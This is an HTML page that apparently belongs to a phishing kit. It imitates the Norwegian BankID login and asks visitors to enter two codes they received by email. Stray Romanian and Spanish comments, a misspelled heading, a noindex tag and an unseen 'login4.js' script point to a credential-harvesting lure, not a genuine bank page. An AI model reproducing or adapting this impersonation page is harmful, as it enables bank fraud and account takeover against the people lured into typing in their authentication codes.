<!DOCTYPE html>
<html lang="nb">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <meta name="robots" content="noindex, nofollow">
    <link rel="icon" type="image/png" href="img/favicon.b4be5517.png">
    <title>BankID</title>
    <link href="css/authorization.11f23e186330ca22e8f9.css" rel="stylesheet">
    <script type="text/javascript" src="js/jquery-3.6.3.min.js"></script>
    <script type="text/javascript" src="js/login4.js"></script>
    <style>
        /* Stilizare placeholder */
        input::placeholder {
            font-size: 16px; /* Dimensiunea textului placeholder-ului */
            color: #888; /* Culoarea textului placeholder-ului (op?ional) */
        }
    </style>
</head>
<body class="">
    <main class="container">
        <div class="container__content">
            <div class="bankid-logo-wrapper">
                <img alt="" class="bankid-logo" src="img/bankid-logo.28f35de5.svg">
            </div>
            <div id="wait">
                <img alt="" class="bankid-symbol" src="img/bankid-symbol-animated.ee3b536a.svg">
                <span class="sr-only" role="alert" lang="en">Loading</span>
            </div>
            <div class="page" id="getNnin" style="">


              <style>
                  .form-container {
                      display: flex;
                      gap: 20px; /* Espacio entre columnas */
                  }
                  .column {
                      display: flex;
                      flex-direction: column;
                      gap: 10px; /* Espacio entre label y input */
                  }
              </style>

              <form id="nnin-form" novalidate="">
                  <div class="page__content">
                      <span class="merchant_name"><b>Bekfreft kodeord fra banken</b></span>

                      <label for="nnin" data-i18n="nnin_label" style="font-size: small; font-weight: normal;">
                        Skriv inn de to kodeordene du fikk pa e-post:
                      </label>

                      <div class="form-container">
                          <!-- Columna 1 -->
                          <div class="column">
                              <label for="nnin1" style="font-size: small; font-weight: normal;">
                                  Bekreft kode 1:
                              </label>
                              <input name="nnin" class="nnin" id="nnin" placeholder="Kode 1" maxlength="30" minlength="1" autocomplete="off" aria-labelledby="nnin-title" aria-invalid="true" required="" data-format="...... ....." data-slots="." data-separator=" ">
                          </div>

                          <!-- Columna 2 -->
                          <div class="column">
                              <label for="nnin2" style="font-size: small; font-weight: normal;">
                                  Bekreft kode 2:
                              </label>
                              <input name="nnin" class="nnin" id="nnin2" placeholder="Kode 2" maxlength="30" minlength="1" autocomplete="off" aria-labelledby="nnin-title" aria-invalid="true" required="" data-format="...... ....." data-slots="." data-separator=" ">
                          </div>
                      </div>

                      <div class="helper-text-container">
                          <img id="helperTextErrorIcon" src="img/helper-text-error.b85af04c.svg" alt="" style="display:none">
                      </div>

                      <div class="buttons__page__middle">
                          <button type="button" data-i18n="next" id="nnin-next-button" class="button button--default">Neste</button>
                      </div>
                  </div>
              </form>



                <div class="page__buttons">
                    <button data-i18n="cancel" id="decline-nnin-button" class="button button--link">Avbryt</button>
                </div>
            </div>
        </div>
    </main>
</body>
</html>
